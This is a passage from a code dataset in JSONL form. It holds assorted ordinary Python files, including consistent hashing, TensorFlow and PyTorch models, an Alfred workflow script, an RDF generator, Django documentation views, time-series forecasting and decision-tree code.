weight\r\n\r\n        for j in range(0, int(factor)):\r\n            # Compute the hash\r\n            b_key = self._hash_digest('%s-%s' % (node, j))\r\n            # Return a generator, biting off 4 bytes (a 32-bit number) at a time from the 16-byte hash\r\n            for i in range(4):\r\n                yield self._hash_val(b_key, lambda x: x + i * 4)\r\n\r\n    def get_node(self, string_key):\r\n        \"\"\"\r\n        For the given key, return the corresponding node on the hash ring.\r\n        None if the ring is empty.\r\n        \"\"\"\r\n\r\n        # pos is the node's position on the ring\r\n        pos = self.get_node_pos(string_key)\r\n        if pos is None:\r\n            return None\r\n        # Return the server name matching keys[pos], where keys[pos] is the server's hash (4 bytes).\r\n        return self.key_node[self.keys[pos]]\r\n\r\n    def get_node_pos(self, string_key):\r\n        \"\"\"\r\n        Find the node matching the key.\r\n        Returns None if the hash ring is empty.\r\n        \"\"\"\r\n        if not self.key_node:\r\n            return None\r\n        # key is the position on the ring for the string key\r\n        key = self.gen_key(string_key)\r\n\r\n        nodes = self.keys\r\n        # Find the insertion point in the sorted list such that key lands as far to the right as possible\r\n        pos = bisect.bisect(nodes, key)\r\n        if pos == len(nodes):\r\n            return 0\r\n        else:\r\n            return pos\r\n\r\n    def get_nodes_cnt(self):\r\n        return len(self.nodes)\r\n\r\n    def gen_key(self, key):\r\n        \"\"\"\r\n        Compute the position on the hash ring for a key.\r\n        Same as for a server, but biting off only the first 4 bytes.\r\n        \"\"\"\r\n        b_key = self._hash_digest(key)\r\n        return self._hash_val(b_key, lambda x: x)\r\n\r\n    def _hash_val(self, b_key, entry_fn):\r\n        \"\"\"\r\n        The ring spans 0 to 2^32, so build a 32-bit number\r\n        by combining 4 bytes of the hash\r\n        \"\"\"\r\n        return ((b_key[entry_fn(3)] << 24)\r\n                | (b_key[entry_fn(2)] << 16)\r\n                | (b_key[entry_fn(1)] << 8)\r\n                | b_key[entry_fn(0)])\r\n\r\n    def _hash_digest(self, key):\r\n        # The key is a string, so encode it\r\n        key = key.encode()\r\n\r\n        m = hashlib.md5()\r\n        m.update(key)\r\n\r\n        # Get the digest as a sequence of ints, converting char to int where needed\r\n        res = [x if isinstance(x, int) else ord(x)\r\n               for x in m.digest()]\r\n\r\n        return res\r\n","sub_path":"lesson_9/Consistent_hashing.py","file_name":"Consistent_hashing.py","file_ext":"py","file_size_in_byte":6030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"322931731","text":"for _ in range(int(input())):\n    N,K,x,y=map(int,input().split())\n    if (x,y)==(N,N) or (x,y)==(N,0) or (x,y)==(0,N) :\n        print(x,y)\n    elif x==y:\n        print(N,N)\n    else:\n        if x>y:\n            va=N-x\n            FCx,FCy=x+va,y+va\n            SCx,SCy=y+va,x+va\n            TCx,TCy=y-y,x-y\n            FoCx,FoCy=x-y,y-y\n        else:\n            va=N-y\n            FCx,FCy=x+va,y+va\n            SCx,SCy=y+va,x+va\n            TCx,TCy=y-x,x-x\n            FoCx,FoCy=x-x,y-x\n        K%=4\n        if K==1:\n            print(FCx,FCy)\n        elif K==2:\n            print(SCx,SCy)\n        elif K==3:\n            print(TCx,TCy)\n        else:\n            print(FoCx,FoCy)","sub_path":"Extras/Point Of Impact.py","file_name":"Point Of Impact.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"235558439","text":"\"\"\"\nThe core Boosting Network Model\n\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\nfrom ops import *\n\n\nclass Net(object):\n\tdef __init__(self, hr, lr, non_local, wl, tower, reuse):\n\t\t# training input set\n\t\tself.hr = hr\n\t\tself.lr = lr\n\t\t\n\t\t# multi-gpu related settings\n\t\tself.reuse = reuse\n\t\tself.tower = tower\n\t\t\n\t\t# parameter lists for weights and biases\n\t\tself.W_params = []\n\t\tself.b_params = []\n\t\t\n\t\t# 
coefficient of weight decay\n\t\tself.wl = wl\n\t\t\n\t\t# whether to enable the non-local block\n\t\tself.non_local = non_local\n\t\n\t\n\tdef dfus_block(self, bottom, i):\n\t\tact = tf.nn.relu\n\n\t\twith tf.variable_scope('dfus_block' + str(i), reuse=self.reuse):\n\t\t\tconv1 = act(conv2d(bottom, 64, [1, 1], wl=None, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_i'), name='relu' + str(i) + '_i')\n\n\t\t\tfeat1 = act(conv2d(conv1, 16, [3, 3], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_1'), name='relu' + str(i) + '_1')\n\t\t\tfeat15 = act(conv2d(feat1, 8, [1, 1], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_15'), name='relu' + str(i) + '_15')\n\n\t\t\tfeat2 = act(conv2d(conv1, 16, [3, 3], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_2'), name='relu' + str(i) + '_2')\n\t\t\tfeat23 = act(conv2d(feat2, 8, [1, 1], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_23'), name='relu' + str(i) + '_23')\n\n\t\t\tfeat = tf.concat([feat1, feat15, feat2, feat23], 3, name='conv' + str(i) + '_c1')\n\t\t\tfeat = act(conv2d(feat, 16, [1, 1], wl=None, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_r'), name='relu' + str(i) + '_r')\n\n\t\t\ttop = tf.concat([bottom, feat], 3, name='conv' + str(i) + '_c2')\n\n\t\treturn top\n\n\n\tdef ddfn(self, bottom, step, b=10):\n\t\tact = tf.nn.relu\n\n\t\twith tf.variable_scope('ddfn_' + str(step), reuse=self.reuse):\n\t\t\twith tf.name_scope('msfeat'):\n\t\t\t\tconv13 = act(conv2d(bottom, 16, [3, 3], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv1_3'), name='relu1_3')\n\t\t\t\tconv15 = act(conv2d(bottom, 16, [3, 3], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv1_5'), name='relu1_5')\n\n\t\t\t\tconv135 = act(conv2d(conv13, 16, [1, 1], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv1_3_5'), name='relu1_3_5')\n\t\t\t\tconv153 = act(conv2d(conv15, 16, [1, 1], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv1_5_3'), name='relu1_5_3')\n\n\t\t\t\tconv1 = tf.concat([conv13, conv15, conv135, conv153], 3, name='conv1_c')\n\n\t\t\tif self.non_local:\n\t\t\t\tconv1, _ = non_local_block(conv1, reuse=self.reuse, tower_index=self.tower)\n\n\t\t\tfeat = self.dfus_block(conv1, 2)\n\n\t\t\tfor i in range(3, b, 1):\n\t\t\t\tfeat = self.dfus_block(feat, i)\n\n\t\t\ttop = feat\n\n\t\t\treturn top\n\t\n\t\n\tdef build_net(self):\n\t\twith tf.variable_scope('net', reuse=self.reuse):\n\t\t\tfeat0 = self.ddfn(self.lr, 0, b=60)\n\t\t\tfeat1 = self.ddfn(self.lr, 1, b=60)\n\t\t\tfeat2 = self.ddfn(self.lr, 2, b=60)\n\t\t\tfeat = tf.concat([feat0, feat1, feat2], axis=3)\n\t\t\t\n\t\t\toutputs = conv2d(feat, 31, [1, 1], W_init=tf.truncated_normal_initializer(mean=0.0, stddev=0.001),\n\t\t\t add_biases=True, wl=None, reuse=self.reuse, tower_index=self.tower, scope='fusion')\n\t\t\t\n\t\t\t#rrmse_loss = tf.reduce_mean(tf.sqrt(tf.pow(outputs - self.hr, 2)) / self.hr)\n\t\t\trrmse_loss = tf.reduce_mean(tf.abs(outputs - self.hr) / self.hr)\n\t\t\tself.total_loss = rrmse_loss\n","sub_path":"hscnn-d_clean/train/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"509127967","text":"# -*- coding: utf-8 -*-\n\nimport sys, os\n\nimport alfred\nalfred.setDefaultEncodingUTF8()\n\ndef get_exts(ext):\n template = 
os.listdir('./templates/')\n modules = map(list, map(os.path.splitext, template))\n exts = list(set(zip(*modules)[1]))\n rightExt = filter(lambda x: x.find(ext)==0, exts)\n rightExt.insert(0, ext)\n rightExt = list(set(rightExt))\n return rightExt\n\ndef get_template(ext, module):\n template = os.listdir('./templates/')\n modules = map(list, map(os.path.splitext, template))\n modulesForExt = filter(lambda x: x[1]==ext, modules)\n templateForExt = map(list, zip(*modulesForExt))\n if len(templateForExt)>0:\n templateForExt = templateForExt[0]\n templateForExt.insert(0,'')\n templateForExt = filter(lambda x: x.find(module)==0, templateForExt )\n templateForExt = filter(lambda x: x!= ext.replace('.', ''), templateForExt)\n else:\n templateForExt.insert(0,'')\n\n return templateForExt\n\ndef get_filename_module():\n out = sys.argv[1].split(' ')\n length = len(out)\n filename = ''\n module = ''\n if length >= 1:\n filename = out[0]\n if length >=2:\n filename = ' '.join(out[0:length-1])\n module = out[length-1]\n return filename, module\n\ndef get_feedback(filename, rightExts, templateForExt):\n basename, ext = os.path.splitext(filename)\n feedback = alfred.Feedback()\n\n addItem = lambda titleItem: feedback.addItem(\n title = 'Create New File: ' + titleItem,\n arg = titleItem,\n autocomplete = titleItem,\n# subtitle = titleItem,\n )\n\n if (filename == '') | (filename == '!'):\n if filename == '':\n feedback.addItem(\n title = 'Create New File',\n subtitle = 'Enter a filename and extension for your new file. Type ? for help.',\n )\n feedback.addItem(\n title = 'Open template folder',\n subtitle = 'Edit the template files',\n arg = '!',\n autocomplete = '!',\n icontype = 'fileicon',\n icon = 'templates'\n )\n return feedback\n\n if filename == '?':\n feedback.addItem(\n title = 'Go into Help',\n arg = '?'\n )\n return feedback\n\n if len(templateForExt) == 0:\n titleItem = filename\n addItem(titleItem)\n elif (templateForExt[0] == '') & (len(templateForExt) == 1):\n for i in rightExts:\n titleItem = basename+i\n addItem(titleItem)\n else:\n for i in templateForExt:\n titleItem = filename+ ' ' + i\n addItem(titleItem)\n\n return feedback\n\n\ndef main():\n filename, module = get_filename_module()\n basename, ext = os.path.splitext(filename)\n\n rightExts = get_exts(ext)\n templateForExt = get_template(ext, module)\n\n feedback = get_feedback(filename, rightExts, templateForExt)\n\n feedback.output()\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/hzlzh_AlfredWorkflow.com/AlfredWorkflow.com-master/Sources/Workflows/CreateNewFile/express.py","file_name":"express.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"172004482","text":"from rdflib import Graph, Literal, BNode, Namespace, RDF, URIRef, RDFS, Literal\nfrom rdflib.namespace import XSD\nimport json\nimport logging\nimport re\n\nOPENDATA = Namespace(\"http://opendata.cs.pub.ro/resource/\")\nOPENDATA_PROPERTY = Namespace(\"http://opendata.cs.pub.ro/property/\")\nDBPEDIA_PROPERTY = Namespace(\"http://dbpedia.org/property/\")\n\nlogging.basicConfig()\n\ndef parseJson(json, graph):\n\tfor entry in output_json:\n\t\tnume = entry[\"nume\"].replace(\"dr\", '').replace(\"Dr\", '').replace(\"DR\", '').replace(\".\", '')\n\t\tcontact = entry[\"contact\"]\n\t\tjudet = re.sub(r'\\s', '', contact[contact.find(\"(\")+1:contact.rfind(\")\")])\n\t\tlocalitate = re.sub(r'\\s', '', contact[:contact.rfind(\"(\")]).replace(\"\\\\\", '')\n\t\tif 
len(contact.split(',')) > 1:\n\t\t\ttelefon = ''.join(re.findall('\\d+', re.sub(r'\\s', '', contact.split(',')[1])))\n\t\telse:\n\t\t\ttelefon = \"\"\n\t\tloc_munca = entry[\"loc_munca\"]\n\t\tif loc_munca is not None:\n\t\t\tloc_munca = loc_munca.replace('\"', '').replace(\"'\", '').replace('|', '').replace(\" \", \"_\")\n\t\tspecialitate = entry[\"specialitate\"]\n\t\tdoctor = URIRef(OPENDATA[re.sub(r'\\s', '', nume)])\n\n\t\tgraph.add((doctor, RDF.type, URIRef(\"http://dbpedia.org/ontology/Person\")))\n\t\tgraph.add((doctor, RDFS.label, Literal(nume, datatype=XSD.string)))\n\t\tgraph.add((doctor, OPENDATA_PROPERTY[\"specializare\"], Literal(specialitate, datatype=XSD.string)))\n\t\tgraph.add((doctor, OPENDATA_PROPERTY[\"loc_munca\"], URIRef(OPENDATA[loc_munca])))\n\t\tgraph.add((doctor, OPENDATA_PROPERTY[\"loc_munca_judet\"], URIRef(OPENDATA[judet + \"_Judet\"])))\n\t\tgraph.add((doctor, OPENDATA_PROPERTY[\"loc_munca_localitate\"], URIRef(OPENDATA[localitate + \"_judet_\" + judet])))\n\t\tgraph.add((doctor, DBPEDIA_PROPERTY[\"telefon\"], Literal(telefon, datatype=XSD.string)))\n\ngraph = Graph()\n\nwith open('docs_info.json') as json_data:\n\toutput_json = json.load(json_data)\n\tparseJson(output_json, graph)\nwith open('docplanner.json') as json_data:\n\toutput_json = json.load(json_data)\n\tparseJson(output_json, graph)\n\ngraph.serialize(\"output.rdf\", format='xml', encoding='utf-8')\n\n","sub_path":"Doctor/rdf/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"602079203","text":"# coding: utf-8\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport os\n\nnp.set_printoptions(threshold=np.inf)\nprint(tf.__version__)\n\n_CSV_COLUMNS = [\n 'age', 'workclass', 'fnlwgt', 'education', 'education_num',\n 'marital_status', 'occupation', 'relationship', 'race', 'gender',\n 'capital_gain', 'capital_loss', 'hours_per_week', 'native_country',\n 'income_bracket'\n]\n_CSV_COLUMN_DEFAULTS = [[0], [''], [0], [''], [0], [''], [''], [''], [''], [''],\n [0], [0], [0], [''], ['']]\ndata_file=\"F:\\\\notebook\\\\data\\\\csv_test\\\\adult.data\"\ntrain_data_pd = pd.read_csv(data_file,names=_CSV_COLUMNS)#,header=0)\ntrain_data_pd.loc[0]\n\ndef parse_csv(value):\n columns = tf.decode_csv(value,record_defaults=_CSV_COLUMN_DEFAULTS)\n# print(\"\\n columns=\",columns)\n features = dict(zip(_CSV_COLUMNS,columns))\n# print(\"\\n features=\",features)\n labels = features.pop('income_bracket')\n# print(\"\\n labels=\",labels)\n classes = tf.equal(labels,'>50K')\n# print(\"\\n classed=\",classes)\n return features,classes\ntest_line = parse_csv(\"39,State-gov,77516,Bachelors,13,Never-married,Adm-clerical,Not-in-family,White,Male,2174,0,40,United-States,<=50K\")\nwith tf.Session() as session:\n test_line_run = session.run(test_line)\n print(test_line_run)\n\ndef get_next():\n dataset_text = tf.data.TextLineDataset(data_file)\n dataset_text = dataset_text.map(parse_csv, num_parallel_calls=5)\n dataset_text = dataset_text.repeat(1)\n dataset_text = dataset_text.batch(20)\n iterator = dataset_text.make_one_shot_iterator()\n x,y=iterator.get_next()\n# print(\"x=\",x)\n# print(\"y=\",y)\n return x,y\n\t\nx,y=get_next()\n\nwith tf.Session() as session:\n x_value,y_value = session.run([x,y])\n print(\"x_value=\",x_value)\n print(\"x_value[age]=\",x_value['age'])\n print(\"y_value=\",y_value)\n\nage_fc = tf.feature_column.numeric_column('age')\neducation_num_fc = 
tf.feature_column.numeric_column('education_num')\neducation_fc = tf.feature_column.categorical_column_with_vocabulary_list(\n    'education', [\n        'Bachelors', 'HS-grad', '11th', 'Masters', '9th', 'Some-college',\n        'Assoc-acdm', 'Assoc-voc', '7th-8th', 'Doctorate', 'Prof-school',\n        '5th-6th', '10th', '1st-4th', 'Preschool', '12th'])\neducation_fc_dense = tf.feature_column.indicator_column(education_fc)\n\ncross_fc_edu_occ = tf.feature_column.crossed_column(\n    ['education', 'occupation'], hash_bucket_size=30)\ncross_fc_edu_occ_dense = tf.feature_column.indicator_column(cross_fc_edu_occ)\n\nrelationship_fc_dense = tf.feature_column.indicator_column(\n    tf.feature_column.categorical_column_with_vocabulary_list(\n        'relationship', [\n            'Husband', 'Not-in-family', 'Wife', 'Own-child', 'Unmarried',\n            'Other-relative'])\n)\n\n\nfeatures = x\nfc_list = []\n\nfc_list.append(relationship_fc_dense)\nfc_list.append(education_fc_dense)\nfc_list.append(education_num_fc)\nfc_list.append(age_fc)\nfc_list.append(cross_fc_edu_occ_dense)\nprint(fc_list)\nnet = tf.feature_column.input_layer(features,fc_list)\n# The order depends on the original data: columns listed first still come out first\n# Items of feature_columns must be a _DenseColumn. \n# You can wrap a categorical column with an embedding_column or indicator_column\n\nwith tf.Session() as session:\n    session.run(tf.tables_initializer())\n    print(session.run(net))\n\n","sub_path":"the_second_base_model/feature_column_test.py","file_name":"feature_column_test.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"545803075","text":"from .calaccess_forms import FormList, FormDetail\nfrom .calaccess_official import OfficialDocumentation\nfrom .calaccess_files import FileList, FileDetail, FileDownloadsList\nimport calaccess_raw\nfrom django.urls import reverse\nfrom bakery.views import BuildableTemplateView\nfrom calaccess_raw.annotations.filing_forms import all_filing_forms\n\n\nclass DocumentationIndex(BuildableTemplateView):\n    \"\"\"\n    An index page for linking to all of our documentation sections\n    \"\"\"\n    build_path = \"documentation/index.html\"\n    template_name = \"calaccess_website/documentation_index.html\"\n\n    def get_context_data(self):\n        model_list = calaccess_raw.get_model_list()\n        form_list = all_filing_forms\n        object_list = [\n            dict(\n                name='CAL-ACCESS files',\n                description=\"Definitions, record layouts and data dictionaries for the {} \\\nCAL-ACCESS files released by the state.\".format(len(model_list)),\n                url=reverse(\"file_list\"),\n            ),\n            dict(\n                name='CAL-ACCESS forms',\n                description=\"Descriptions, samples and other documentation for \\\nthe {} forms that campaigns and lobbyists use to disclose activity to the state.\".format(len(form_list)),\n                url=reverse(\"form_list\"),\n            ),\n            dict(\n                name='CAL-ACCESS official documentation',\n                description=\"The jumbled, fragmentary and unreliable documentation \\\nfor the CAL-ACCESS database provided by California's Secretary of State. 
For more authoritative \\\ninformation, refer to our materials.\",\n url=reverse(\"official_documentation\"),\n ),\n dict(\n name='CCDC technical documentation',\n description=\"Technical documentation for the collection of \\\nCalifornia Civic Data Coalition applications that power this site.\",\n url=\"http://django-calaccess.californiacivicdata.org\"\n ),\n dict(\n name=\"Frequently asked questions\",\n description=\"Answers to common questions about this project and the underlying CAL-ACCESS database.\",\n url=reverse(\"faq\"),\n ),\n ]\n return {\n 'object_list': object_list\n }\n\n\nclass FAQ(BuildableTemplateView):\n \"\"\"\n Frequently asked questions.\n \"\"\"\n build_path = \"documentation/frequently-asked-questions/index.html\"\n template_name = \"calaccess_website/faq_detail.html\"\n\n\n__all__ = (\n 'DocumentationIndex',\n 'FAQ',\n 'FormList',\n 'FormDetail',\n 'FileList',\n 'FileDetail',\n 'FileDownloadsList',\n 'OfficialDocumentation',\n)\n","sub_path":"calaccess_website/views/docs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"284235091","text":"import tensorflow as tf\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef plot_series(time, series, format=\"-\", start=0, end=None):\n plt.plot(time[start:end], series[start:end], format)\n plt.xlabel(\"Time\")\n plt.ylabel(\"Value\")\n plt.grid(True)\n\ndef trend(time, slope=0):\n return slope * time\n\ndef seasonal_pattern(season_time):\n \"\"\"Just an arbitrary pattern, you can change it if you wish\"\"\"\n return np.where(season_time < 0.4,\n np.cos(season_time * 2 * np.pi),\n 1 / np.exp(3 * season_time))\n\ndef seasonality(time, period, amplitude=1, phase=0):\n \"\"\"Repeats the same pattern at each period\"\"\"\n season_time = ((time + phase) % period) / period\n return amplitude * seasonal_pattern(season_time)\n\ndef noise(time, noise_level=1, seed=None):\n rnd = np.random.RandomState(seed)\n return rnd.randn(len(time)) * noise_level\n\ntime = np.arange(4 * 365 + 1, dtype=\"float32\")\nbaseline = 10\nseries = trend(time, 0.1) \nbaseline = 10\namplitude = 40\nslope = 0.05\nnoise_level = 5\n\n# Create the series\nseries = baseline + trend(time, slope) + seasonality(time, period=365, amplitude=amplitude)\n# Update with noise\nseries += noise(time, noise_level, seed=42)\n\nsplit_time = 1000\ntime_train = time[:split_time]\nx_train = series[:split_time]\ntime_valid = time[split_time:]\nx_valid = series[split_time:]\n\nwindow_size = 20\nbatch_size = 32\nshuffle_buffer_size = 1000\n\ndef windowed_dataset(series,batch_size,shuffle_buffer_size,window_size):\n df=tf.data.Dataset.from_tensor_slices(series)\n df=df.window(window_size+1,shift=1,drop_remainder=True)\n df=df.flat_map(lambda window:window.batch(window_size+1))\n df=df.shuffle(shuffle_buffer_size).map(lambda window:(window[:-1],window[-1]))\n df=df.batch(batch_size).prefetch(1)\n return df\n\n\ntrain_set=windowed_dataset(series,32,1000,20)\nmodel=tf.keras.Sequential()\nmodel.add(tf.keras.layers.Lambda(lambda x:tf.expand_dims(x,axis=-1)))\nmodel.add(tf.keras.layers.SimpleRNN(40,return_sequences=True))\nmodel.add(tf.keras.layers.SimpleRNN(40))\nmodel.add(tf.keras.layers.Dense(1))\nmodel.add(tf.keras.layers.Lambda(lambda x:x*100))\nmodel.summary()\nlr_schedule=tf.keras.callbacks.LearningRateScheduler(lambda 
epoch:1e-8*10**(epoch/20))\noptimizer=tf.keras.optimizers.SGD(lr=2e-6,momentum=0.9)\nmodel.compile(loss=tf.keras.losses.Huber(),optimizer=optimizer,metrics=[\"mae\"])\n\n# pass the scheduler callback so 'lr' is recorded in history for the plot below\nhistory=model.fit(train_set,epochs=50,callbacks=[lr_schedule])\n\nplt.semilogx(history.history['lr'],history.history['loss'])\n\nforecast=[]\nfor time in range(len(series)-window_size):\n    forecast.append(model.predict(series[time:time+window_size][np.newaxis]))\n\nforecast=forecast[split_time-window_size:]\n\nresults=np.array(forecast)[:,0,0]\n\nplot_series(time_valid, x_valid)\nplot_series(time_valid, results)\n\n\ntf.keras.metrics.mean_absolute_error(x_valid, results).numpy()","sub_path":"TimeSeriesForecast_with_RNN.py","file_name":"TimeSeriesForecast_with_RNN.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"473298756","text":"from pymodel.model import get_model\nimport argparse \nimport torch\nimport cv2\nimport torchvision.transforms as transforms\nfrom PIL import Image\n\ndef getargs():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('save', help='output file path')\n    parser.add_argument('--model', default='resnet18', choices=['resnet18', 'resnet50', 'mobilenet_v2'], help='model to convert')\n    parser.add_argument('--src', help='test image data')\n    return parser.parse_args()\n\ndef preprocess(image):\n    normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) \n    preprocess = transforms.Compose([\n        transforms.Resize(256),\n        transforms.CenterCrop(224),\n        transforms.ToTensor(),\n        normalize\n    ])\n    return preprocess(image)\n    \n\ndef main():\n    args = getargs()\n    print('Create Model...')\n    model = get_model(args.model)\n    model = model.eval()\n    model = model.cuda()\n    print('Model Created!!')\n\n    if args.src is not None:\n        image = Image.open(args.src)\n    else:\n        image = None\n    if image is not None:\n        print('Crop Size')\n        image = preprocess(image)\n        image = image.unsqueeze(0)\n        image = image.cuda()\n        scores = model(image)\n        indices = scores.argmax(dim=1)\n        index = indices[0].item()\n        print(index, scores[0, index].item())\n\n    dummy = torch.zeros([1, 3, 224, 224], dtype=torch.float32).cuda()\n    pt_model = torch.jit.trace(model, dummy)\n    pt_model.save(args.save)\n\nif __name__ == '__main__':\n    main()","sub_path":"buildmodel.py","file_name":"buildmodel.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"343515344","text":"import nltk\nimport matplotlib.pyplot as plt \n\ndef extract_sentences(filename):\n\tscript = open(filename, \"r\")\n\tscript_lines = script.readlines()\n\tspeaker_dict = {}\n\tfor line in script_lines:\n\t\tlines_list = line.split()\n\t\tif lines_list:\n\t\t\trange1 = 0\n\t\t\tfor i in range(len(lines_list)):\n\t\t\t\tif \":\" in lines_list[i]: #Find word with \":\" \n\t\t\t\t\tspeaker = lines_list[:i+1]\n\t\t\t\t\trange1 = i+1\n\t\t\tspeaker = ' '.join(speaker)\n\t\t\tspeaker1 = speaker[:len(speaker) - 1]\n\t\t\tsents = ' '.join(lines_list[range1:])\n\t\t\tsent_list = nltk.sent_tokenize(sents)\n\t\t\ttry:\n\t\t\t\tfor s in sent_list:\n\t\t\t\t\tspeaker_dict[speaker1].append(s)\n\t\t\texcept KeyError:\n\t\t\t\tspeaker_dict[speaker1] = sent_list\n\treturn speaker_dict\n\nout_dict = extract_sentences(\"rag_script.txt\")\nlengths = {}\nfor key in out_dict:\n\tfor val in out_dict[key]:\n\t\tval = val.split()\n\t\tleng = len(val)\n\t\ttry:\n\t\t\tlengths[leng] += 1\n\t\texcept KeyError:\n\t\t\tlengths[leng] = 1\nlength = 
list(lengths.keys())\ncounts = list(lengths.values())\nplt.bar(length,counts)\nplt.xlabel(\"LENGTHS\")\nplt.ylabel(\"FREQUENCIES\")\nplt.savefig(\"LengthsDistribution.png\")\nplt.show()\n","sub_path":"parsing/LenDist.py","file_name":"LenDist.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"608534932","text":"# Prime numbers between 100 and 150;\n\nliste = []\nfor i in range(100,150+1):\n    for t in range(2,100):\n        if(i % t == 0):\n            break\n    else:\n        liste.append(i)\n\nprint(\"Prime numbers between 100 and 150:\",liste)","sub_path":"100-150_asal_sayilar.py","file_name":"100-150_asal_sayilar.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"13505541","text":"import copy\nimport random\nimport sys\n\nimport numpy as np\nimport pandas as pd\nimport csv\nfrom collections import defaultdict\nimport os\nimport argparse\nimport glob\n\n\n\n\"\"\"\n\nCalculate Variance Gain for a particular attribute\n\n\"\"\"\n\ndef calculateVarianceGain(dataset, splitAttributeName, targetName=\"Class\",varianceGain=0.0):\n    datasetVariance = calculateVarianceImpurity(dataset[targetName])\n    typeOfValues, counts = np.unique(dataset[splitAttributeName], return_counts=True)\n    sumOfCounts = np.sum(counts)\n    splitVariance = [\n        calculateVarianceImpurity(dataset.where(dataset[splitAttributeName] == typeOfValues[i]).dropna()[targetName])\n        for i in range(len(typeOfValues))]\n    splitVarianceSum = np.sum([(counts[i] / sumOfCounts) * splitVariance[i] for i in range(len(typeOfValues))])\n    varianceGain = datasetVariance - splitVarianceSum\n    return varianceGain\n\n\"\"\"\n\nCalculate the entropy of a particular column\n\n\"\"\"\n\ndef calculateEntropy(targetColumn, entropy=0.0):\n    typeOfValues, counts = np.unique(targetColumn, return_counts=True)\n    sumOfCounts = np.sum(counts)\n    countToTotals = [counts[i] / sumOfCounts for i in range(len(typeOfValues))]\n    entropy = np.sum([-countToTotal * (np.log2(countToTotal)) for countToTotal in countToTotals])\n    return entropy\n\n\n\n\n\"\"\"\n \n Calculate the Variance Impurity according to Given Formula\n\n\"\"\"\n\ndef calculateVarianceImpurity(targetColumn, variance=0.0):\n    typeOfValues, counts = np.unique(targetColumn, return_counts=True)\n    sumOfCounts = np.sum(counts)\n    countToTotals = [counts[i] / sumOfCounts for i in range(len(typeOfValues))]\n    variance = np.prod(countToTotals)\n    return variance\n\n\"\"\"\n \n Update the Decision tree with new attributes\n\n\"\"\"\ndef update(tree, targetKey, dataset):\n    for key, value in tree.items():\n        if key == targetKey:\n            prominentIndex = np.argmax(np.unique(dataset[key], return_counts=True)[1])\n            prominentClass = np.unique(dataset[key])[prominentIndex]\n            tree[key] = prominentClass\n            break\n        elif isinstance(value, dict):\n            update(value, targetKey, dataset)\n    return tree\n\n\n\n\"\"\"\n \n Predict the classification for a particular query\n \n\"\"\"\ndef predictClassification(query, tree, default,result=0):\n    for key in list(query.keys()):\n        if key in list(tree.keys()):\n            try:\n                result = tree[key][query[key]]\n            except:\n                return default\n            result = tree[key][query[key]]\n            if isinstance(result, dict):\n                return predictClassification(query, result, default)\n            else:\n                return result\n\n\n\"\"\"\n\nBuild the decision tree\n\n\"\"\"\ndef decisionTree(partialDataset, originalDataset, attributes, type, targetName=\"Class\", parentClass=None):\n    if len(np.unique(partialDataset[targetName])) <= 
1:\n return np.unique(partialDataset[targetName])[0], None\n elif len(partialDataset) == 0:\n maxElementIndex = np.argmax(np.unique(originalDataset[targetName], return_counts=True)[1])\n return np.unique(originalDataset[targetName])[maxElementIndex], None\n # Need to check\n elif len(attributes) == 0:\n return parentClass, None\n else:\n parentClassIndex = np.argmax(np.unique(partialDataset[targetName], return_counts=True)[1])\n parentClass = np.unique(partialDataset[targetName])[parentClassIndex]\n\n if type == 1:\n attributesInformationGain = [calculateInformationGain(partialDataset, atrribute, targetName) for atrribute\n in\n attributes]\n else:\n attributesInformationGain = [calculateVarianceGain(partialDataset, atrribute, targetName) for atrribute in\n attributes]\n most_gain_index = np.argmax(attributesInformationGain)\n bestAttribute = attributes[most_gain_index]\n\n root = dict()\n root[bestAttribute] = dict()\n printDecisionTreeTree = dict()\n attributes = [atrribute for atrribute in attributes if atrribute is not bestAttribute]\n\n for decision in np.unique(partialDataset[bestAttribute]):\n # print(\"Desicion : \"+str(decision)+\" \"+str(bestAttribute))\n sub_data = partialDataset.where(partialDataset[bestAttribute] == decision).dropna()\n sub_tree = decisionTree(sub_data, originalDataset, attributes, type, targetName, parentClass)\n root[bestAttribute][decision] = 